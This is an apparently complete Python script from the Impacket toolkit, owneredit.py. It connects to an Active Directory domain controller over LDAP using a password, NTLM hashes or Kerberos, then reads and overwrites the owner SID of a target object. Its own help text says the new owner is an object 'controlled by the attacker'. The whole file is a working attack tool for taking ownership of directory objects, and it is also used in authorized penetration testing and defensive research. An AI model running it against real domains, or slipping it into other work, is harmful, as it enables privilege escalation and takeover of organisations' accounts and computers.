#!/usr/bin/env python3 # Impacket - Collection of Python classes for working with network protocols. # # SECUREAUTH LABS. Copyright (C) 2021 SecureAuth Corporation. All rights reserved. # # This software is provided under a slightly modified version # of the Apache Software License. See the accompanying LICENSE file # for more information. # # Description: # Python script for handling the msDS-AllowedToActOnBehalfOfOtherIdentity property of a target computer # # Authors: # Charlie BROMBERG (@_nwodtuhs) import argparse import logging import sys import traceback import ldap3 import ssl import ldapdomaindump from binascii import unhexlify from ldap3.protocol.formatters.formatters import format_sid from impacket import version from impacket.examples import logger, utils from impacket.ldap import ldaptypes from impacket.smbconnection import SMBConnection from impacket.spnego import SPNEGO_NegTokenInit, TypesMech from ldap3.utils.conv import escape_filter_chars from ldap3.protocol.microsoft import security_descriptor_control # Universal SIDs WELL_KNOWN_SIDS = { 'S-1-0': 'Null Authority', 'S-1-0-0': 'Nobody', 'S-1-1': 'World Authority', 'S-1-1-0': 'Everyone', 'S-1-2': 'Local Authority', 'S-1-2-0': 'Local', 'S-1-2-1': 'Console Logon', 'S-1-3': 'Creator Authority', 'S-1-3-0': 'Creator Owner', 'S-1-3-1': 'Creator Group', 'S-1-3-2': 'Creator Owner Server', 'S-1-3-3': 'Creator Group Server', 'S-1-3-4': 'Owner Rights', 'S-1-5-80-0': 'All Services', 'S-1-4': 'Non-unique Authority', 'S-1-5': 'NT Authority', 'S-1-5-1': 'Dialup', 'S-1-5-2': 'Network', 'S-1-5-3': 'Batch', 'S-1-5-4': 'Interactive', 'S-1-5-6': 'Service', 'S-1-5-7': 'Anonymous', 'S-1-5-8': 'Proxy', 'S-1-5-9': 'Enterprise Domain Controllers', 'S-1-5-10': 'Principal Self', 'S-1-5-11': 'Authenticated Users', 'S-1-5-12': 'Restricted Code', 'S-1-5-13': 'Terminal Server Users', 'S-1-5-14': 'Remote Interactive Logon', 'S-1-5-15': 'This Organization', 'S-1-5-17': 'This Organization', 'S-1-5-18': 'Local System', 'S-1-5-19': 'NT Authority', 'S-1-5-20': 'NT Authority', 'S-1-5-32-544': 'Administrators', 'S-1-5-32-545': 'Users', 'S-1-5-32-546': 'Guests', 'S-1-5-32-547': 'Power Users', 'S-1-5-32-548': 'Account Operators', 'S-1-5-32-549': 'Server Operators', 'S-1-5-32-550': 'Print Operators', 'S-1-5-32-551': 'Backup Operators', 'S-1-5-32-552': 'Replicators', 'S-1-5-64-10': 'NTLM Authentication', 'S-1-5-64-14': 'SChannel Authentication', 'S-1-5-64-21': 'Digest Authority', 'S-1-5-80': 'NT Service', 'S-1-5-83-0': 'NT VIRTUAL MACHINE\Virtual Machines', 'S-1-16-0': 'Untrusted Mandatory Level', 'S-1-16-4096': 'Low Mandatory Level', 'S-1-16-8192': 'Medium Mandatory Level', 'S-1-16-8448': 'Medium Plus Mandatory Level', 'S-1-16-12288': 'High Mandatory Level', 'S-1-16-16384': 'System Mandatory Level', 'S-1-16-20480': 'Protected Process Mandatory Level', 'S-1-16-28672': 'Secure Process Mandatory Level', 'S-1-5-32-554': 'BUILTIN\Pre-Windows 2000 Compatible Access', 'S-1-5-32-555': 'BUILTIN\Remote Desktop Users', 'S-1-5-32-557': 'BUILTIN\Incoming Forest Trust Builders', 'S-1-5-32-556': 'BUILTIN\\Network Configuration Operators', 'S-1-5-32-558': 'BUILTIN\Performance Monitor Users', 'S-1-5-32-559': 'BUILTIN\Performance Log Users', 'S-1-5-32-560': 'BUILTIN\Windows Authorization Access Group', 'S-1-5-32-561': 'BUILTIN\Terminal Server License Servers', 'S-1-5-32-562': 'BUILTIN\Distributed COM Users', 'S-1-5-32-569': 'BUILTIN\Cryptographic Operators', 'S-1-5-32-573': 'BUILTIN\Event Log Readers', 'S-1-5-32-574': 'BUILTIN\Certificate Service DCOM Access', 'S-1-5-32-575': 'BUILTIN\RDS Remote Access Servers', 'S-1-5-32-576': 'BUILTIN\RDS Endpoint Servers', 'S-1-5-32-577': 'BUILTIN\RDS Management Servers', 'S-1-5-32-578': 'BUILTIN\Hyper-V Administrators', 'S-1-5-32-579': 'BUILTIN\Access Control Assistance Operators', 'S-1-5-32-580': 'BUILTIN\Remote Management Users', } class OwnerEdit(object): def __init__(self, ldap_server, ldap_session, args): super(OwnerEdit, self).__init__() self.ldap_server = ldap_server self.ldap_session = ldap_session self.target_sAMAccountName = args.target_sAMAccountName self.target_SID = args.target_SID self.target_DN = args.target_DN self.new_owner_sAMAccountName = args.new_owner_sAMAccountName self.new_owner_SID = args.new_owner_SID self.new_owner_DN = args.new_owner_DN logging.debug('Initializing domainDumper()') cnf = ldapdomaindump.domainDumpConfig() cnf.basepath = None self.domain_dumper = ldapdomaindump.domainDumper(self.ldap_server, self.ldap_session, cnf) if self.target_sAMAccountName or self.target_SID or self.target_DN: # Searching for target account with its security descriptor self.search_target_principal_security_descriptor() # Extract security descriptor data self.target_principal_raw_security_descriptor = self.target_principal['nTSecurityDescriptor'].raw_values[0] self.target_principal_security_descriptor = ldaptypes.SR_SECURITY_DESCRIPTOR(data=self.target_principal_raw_security_descriptor) # Searching for the owner SID if any owner argument was given and new_owner_SID wasn't if self.new_owner_SID is None and self.new_owner_sAMAccountName is not None or self.new_owner_DN is not None: _lookedup_owner = "" if self.new_owner_sAMAccountName is not None: _lookedup_owner = self.new_owner_sAMAccountName self.ldap_session.search(self.domain_dumper.root, '(sAMAccountName=%s)' % escape_filter_chars(_lookedup_owner), attributes=['objectSid']) elif self.new_owner_DN is not None: _lookedup_owner = self.new_owner_DN self.ldap_session.search(self.domain_dumper.root, '(distinguishedName=%s)' % _lookedup_owner, attributes=['objectSid']) try: self.new_owner_SID = format_sid(self.ldap_session.entries[0]['objectSid'].raw_values[0]) logging.debug("Found new owner SID: %s" % self.new_owner_SID) except IndexError: logging.error('New owner SID not found in LDAP (%s)' % _lookedup_owner) exit(1) def read(self): current_owner_SID = format_sid(self.target_principal_security_descriptor['OwnerSid']).formatCanonical() logging.info("Current owner information below") logging.info("- SID: %s" % current_owner_SID) logging.info("- sAMAccountName: %s" % self.resolveSID(current_owner_SID)) self.ldap_session.search(self.domain_dumper.root, '(objectSid=%s)' % current_owner_SID, attributes=['distinguishedName']) current_owner_distinguished_name = self.ldap_session.entries[0] logging.info("- distinguishedName: %s" % current_owner_distinguished_name['distinguishedName']) def write(self): logging.debug('Attempt to modify the OwnerSid') _new_owner_SID = ldaptypes.LDAP_SID() _new_owner_SID.fromCanonical(self.new_owner_SID) # lib doesn't set this, but I don't known if it's needed # _new_owner_SID['SubLen'] = len(_new_owner_SID['SubAuthority']) self.target_principal_security_descriptor['OwnerSid'] = _new_owner_SID self.ldap_session.modify( self.target_principal.entry_dn, {'nTSecurityDescriptor': (ldap3.MODIFY_REPLACE, [ self.target_principal_security_descriptor.getData() ])}, controls=security_descriptor_control(sdflags=0x01)) if self.ldap_session.result['result'] == 0: logging.info('OwnerSid modified successfully!') else: if self.ldap_session.result['result'] == 50: logging.error('Could not modify object, the server reports insufficient rights: %s', self.ldap_session.result['message']) elif self.ldap_session.result['result'] == 19: logging.error('Could not modify object, the server reports a constrained violation: %s', self.ldap_session.result['message']) else: logging.error('The server returned an error: %s', self.ldap_session.result['message']) # Attempts to retrieve the Security Descriptor of the specified target def search_target_principal_security_descriptor(self): _lookedup_principal = "" # Set SD flags to only query for OwnerSid controls = security_descriptor_control(sdflags=0x01) if self.target_sAMAccountName is not None: _lookedup_principal = self.target_sAMAccountName self.ldap_session.search(self.domain_dumper.root, '(sAMAccountName=%s)' % escape_filter_chars(_lookedup_principal), attributes=['nTSecurityDescriptor'], controls=controls) elif self.target_SID is not None: _lookedup_principal = self.target_SID self.ldap_session.search(self.domain_dumper.root, '(objectSid=%s)' % _lookedup_principal, attributes=['nTSecurityDescriptor'], controls=controls) elif self.target_DN is not None: _lookedup_principal = self.target_DN self.ldap_session.search(self.domain_dumper.root, '(distinguishedName=%s)' % _lookedup_principal, attributes=['nTSecurityDescriptor'], controls=controls) try: self.target_principal = self.ldap_session.entries[0] logging.debug('Target principal found in LDAP (%s)' % _lookedup_principal) except IndexError: logging.error('Target principal not found in LDAP (%s)' % _lookedup_principal) exit(0) # Attempts to resolve a SID and return the corresponding samaccountname def resolveSID(self, sid): # Tries to resolve the SID from the well known SIDs if sid in WELL_KNOWN_SIDS.keys() or False: return WELL_KNOWN_SIDS[sid] # Tries to resolve the SID from the LDAP domain dump else: self.ldap_session.search(self.domain_dumper.root, '(objectSid=%s)' % sid, attributes=['samaccountname']) try: dn = self.ldap_session.entries[0].entry_dn samname = self.ldap_session.entries[0]['samaccountname'] return samname except IndexError: logging.debug('SID not found in LDAP: %s' % sid) return "" def parse_args(): parser = argparse.ArgumentParser(add_help=True, description='Python editor for a principal\'s DACL.') parser.add_argument('identity', action='store', help='domain.local/username[:password]') parser.add_argument('-use-ldaps', action='store_true', help='Use LDAPS instead of LDAP') parser.add_argument('-ts', action='store_true', help='Adds timestamp to every logging output') parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON') auth_con = parser.add_argument_group('authentication & connection') auth_con.add_argument('-hashes', action="store", metavar="LMHASH:NTHASH", help='NTLM hashes, format is LMHASH:NTHASH') auth_con.add_argument('-no-pass', action="store_true", help='don\'t ask for password (useful for -k)') auth_con.add_argument('-k', action="store_true", help='Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use the ones specified in the command line') auth_con.add_argument('-aesKey', action="store", metavar="hex key", help='AES key to use for Kerberos Authentication (128 or 256 bits)') auth_con.add_argument('-dc-ip', action='store', metavar="ip address", help='IP Address of the domain controller or KDC (Key Distribution Center) for Kerberos. If omitted it will use the domain part (FQDN) specified in the identity parameter') new_owner_parser = parser.add_argument_group("owner", description="Object, controlled by the attacker, to set as owner of the target object") new_owner_parser.add_argument("-new-owner", dest="new_owner_sAMAccountName", metavar="NAME", type=str, required=False, help="sAMAccountName") new_owner_parser.add_argument("-new-owner-sid", dest="new_owner_SID", metavar="SID", type=str, required=False, help="Security IDentifier") new_owner_parser.add_argument("-new-owner-dn", dest="new_owner_DN", metavar="DN", type=str, required=False, help="Distinguished Name") target_parser = parser.add_argument_group("target", description="Target object to edit the owner of") target_parser.add_argument("-target", dest="target_sAMAccountName", metavar="NAME", type=str, required=False, help="sAMAccountName") target_parser.add_argument("-target-sid", dest="target_SID", metavar="SID", type=str, required=False, help="Security IDentifier") target_parser.add_argument("-target-dn", dest="target_DN", metavar="DN", type=str, required=False, help="Distinguished Name") dacl_parser = parser.add_argument_group("dacl editor") dacl_parser.add_argument('-action', choices=['read', 'write'], nargs='?', default='read', help='Action to operate on the owner attribute') if len(sys.argv) == 1: parser.print_help() sys.exit(1) return parser.parse_args() def parse_identity(args): domain, username, password = utils.parse_credentials(args.identity) if domain == '': logging.critical('Domain should be specified!') sys.exit(1) if password == '' and username != '' and args.hashes is None and args.no_pass is False and args.aesKey is None: from getpass import getpass logging.info("No credentials supplied, supply password") password = getpass("Password:") if args.aesKey is not None: args.k = True if args.hashes is not None: lmhash, nthash = args.hashes.split(':') else: lmhash = '' nthash = '' return domain, username, password, lmhash, nthash def init_logger(args): # Init the example's logger theme and debug level logger.init(args.ts) if args.debug is True: logging.getLogger().setLevel(logging.DEBUG) # Print the Library's installation path logging.debug(version.getInstallationPath()) else: logging.getLogger().setLevel(logging.INFO) logging.getLogger('impacket.smbserver').setLevel(logging.ERROR) def get_machine_name(args, domain): if args.dc_ip is not None: s = SMBConnection(args.dc_ip, args.dc_ip) else: s = SMBConnection(domain, domain) try: s.login('', '') except Exception: if s.getServerName() == '': raise Exception('Error while anonymous logging into %s' % domain) else: s.logoff() return s.getServerName() def ldap3_kerberos_login(connection, target, user, password, domain='', lmhash='', nthash='', aesKey='', kdcHost=None, TGT=None, TGS=None, useCache=True): from pyasn1.codec.ber import encoder, decoder from pyasn1.type.univ import noValue """ logins into the target system explicitly using Kerberos. Hashes are used if RC4_HMAC is supported. :param string user: username :param string password: password for the user :param string domain: domain where the account is valid for (required) :param string lmhash: LMHASH used to authenticate using hashes (password is not used) :param string nthash: NTHASH used to authenticate using hashes (password is not used) :param string aesKey: aes256-cts-hmac-sha1-96 or aes128-cts-hmac-sha1-96 used for Kerberos authentication :param string kdcHost: hostname or IP Address for the KDC. If None, the domain will be used (it needs to resolve tho) :param struct TGT: If there's a TGT available, send the structure here and it will be used :param struct TGS: same for TGS. See smb3.py for the format :param bool useCache: whether or not we should use the ccache for credentials lookup. If TGT or TGS are specified this is False :return: True, raises an Exception if error. """ if lmhash != '' or nthash != '': if len(lmhash) % 2: lmhash = '0' + lmhash if len(nthash) % 2: nthash = '0' + nthash try: # just in case they were converted already lmhash = unhexlify(lmhash) nthash = unhexlify(nthash) except TypeError: pass # Importing down here so pyasn1 is not required if kerberos is not used. from impacket.krb5.ccache import CCache from impacket.krb5.asn1 import AP_REQ, Authenticator, TGS_REP, seq_set from impacket.krb5.kerberosv5 import getKerberosTGT, getKerberosTGS from impacket.krb5 import constants from impacket.krb5.types import Principal, KerberosTime, Ticket import datetime if TGT is not None or TGS is not None: useCache = False target = 'ldap/%s' % target if useCache: domain, user, TGT, TGS = CCache.parseFile(domain, user, target) # First of all, we need to get a TGT for the user userName = Principal(user, type=constants.PrincipalNameType.NT_PRINCIPAL.value) if TGT is None: if TGS is None: tgt, cipher, oldSessionKey, sessionKey = getKerberosTGT(userName, password, domain, lmhash, nthash, aesKey, kdcHost) else: tgt = TGT['KDC_REP'] cipher = TGT['cipher'] sessionKey = TGT['sessionKey'] if TGS is None: serverName = Principal(target, type=constants.PrincipalNameType.NT_SRV_INST.value) tgs, cipher, oldSessionKey, sessionKey = getKerberosTGS(serverName, domain, kdcHost, tgt, cipher, sessionKey) else: tgs = TGS['KDC_REP'] cipher = TGS['cipher'] sessionKey = TGS['sessionKey'] # Let's build a NegTokenInit with a Kerberos REQ_AP blob = SPNEGO_NegTokenInit() # Kerberos blob['MechTypes'] = [TypesMech['MS KRB5 - Microsoft Kerberos 5']] # Let's extract the ticket from the TGS tgs = decoder.decode(tgs, asn1Spec=TGS_REP())[0] ticket = Ticket() ticket.from_asn1(tgs['ticket']) # Now let's build the AP_REQ apReq = AP_REQ() apReq['pvno'] = 5 apReq['msg-type'] = int(constants.ApplicationTagNumbers.AP_REQ.value) opts = [] apReq['ap-options'] = constants.encodeFlags(opts) seq_set(apReq, 'ticket', ticket.to_asn1) authenticator = Authenticator() authenticator['authenticator-vno'] = 5 authenticator['crealm'] = domain seq_set(authenticator, 'cname', userName.components_to_asn1) now = datetime.datetime.utcnow() authenticator['cusec'] = now.microsecond authenticator['ctime'] = KerberosTime.to_asn1(now) encodedAuthenticator = encoder.encode(authenticator) # Key Usage 11 # AP-REQ Authenticator (includes application authenticator # subkey), encrypted with the application session key # (Section 5.5.1) encryptedEncodedAuthenticator = cipher.encrypt(sessionKey, 11, encodedAuthenticator, None) apReq['authenticator'] = noValue apReq['authenticator']['etype'] = cipher.enctype apReq['authenticator']['cipher'] = encryptedEncodedAuthenticator blob['MechToken'] = encoder.encode(apReq) request = ldap3.operation.bind.bind_operation(connection.version, ldap3.SASL, user, None, 'GSS-SPNEGO', blob.getData()) # Done with the Kerberos saga, now let's get into LDAP if connection.closed: # try to open connection if closed connection.open(read_server_info=False) connection.sasl_in_progress = True response = connection.post_send_single_response(connection.send('bindRequest', request, None)) connection.sasl_in_progress = False if response[0]['result'] != 0: raise Exception(response) connection.bound = True return True def init_ldap_connection(target, tls_version, args, domain, username, password, lmhash, nthash): user = '%s\\%s' % (domain, username) connect_to = target if args.dc_ip is not None: connect_to = args.dc_ip if tls_version is not None: use_ssl = True port = 636 tls = ldap3.Tls(validate=ssl.CERT_NONE, version=tls_version) else: use_ssl = False port = 389 tls = None ldap_server = ldap3.Server(connect_to, get_info=ldap3.ALL, port=port, use_ssl=use_ssl, tls=tls) if args.k: ldap_session = ldap3.Connection(ldap_server) ldap_session.bind() ldap3_kerberos_login(ldap_session, target, username, password, domain, lmhash, nthash, args.aesKey, kdcHost=args.dc_ip) elif args.hashes is not None: ldap_session = ldap3.Connection(ldap_server, user=user, password=lmhash + ":" + nthash, authentication=ldap3.NTLM, auto_bind=True) else: ldap_session = ldap3.Connection(ldap_server, user=user, password=password, authentication=ldap3.NTLM, auto_bind=True) return ldap_server, ldap_session def init_ldap_session(args, domain, username, password, lmhash, nthash): if args.k: target = get_machine_name(args, domain) else: if args.dc_ip is not None: target = args.dc_ip else: target = domain if args.use_ldaps is True: try: return init_ldap_connection(target, ssl.PROTOCOL_TLSv1_2, args, domain, username, password, lmhash, nthash) except ldap3.core.exceptions.LDAPSocketOpenError: return init_ldap_connection(target, ssl.PROTOCOL_TLSv1, args, domain, username, password, lmhash, nthash) else: return init_ldap_connection(target, None, args, domain, username, password, lmhash, nthash) def main(): print(version.BANNER) args = parse_args() init_logger(args) if args.action == 'write' and args.new_owner_sAMAccountName is None and args.new_owner_SID is None and args.new_owner_DN is None: logging.critical('-owner, -owner-sid, or -owner-dn should be specified when using -action write') sys.exit(1) if args.action == "restore" and not args.filename: logging.critical('-file is required when using -action restore') domain, username, password, lmhash, nthash = parse_identity(args) if len(nthash) > 0 and lmhash == "": lmhash = "aad3b435b51404eeaad3b435b51404ee" try: ldap_server, ldap_session = init_ldap_session(args, domain, username, password, lmhash, nthash) owneredit = OwnerEdit(ldap_server, ldap_session, args) if args.action == 'read': owneredit.read() elif args.action == 'write': owneredit.read() owneredit.write() except Exception as e: if logging.getLogger().level == logging.DEBUG: traceback.print_exc() logging.error(str(e)) if __name__ == '__main__': main()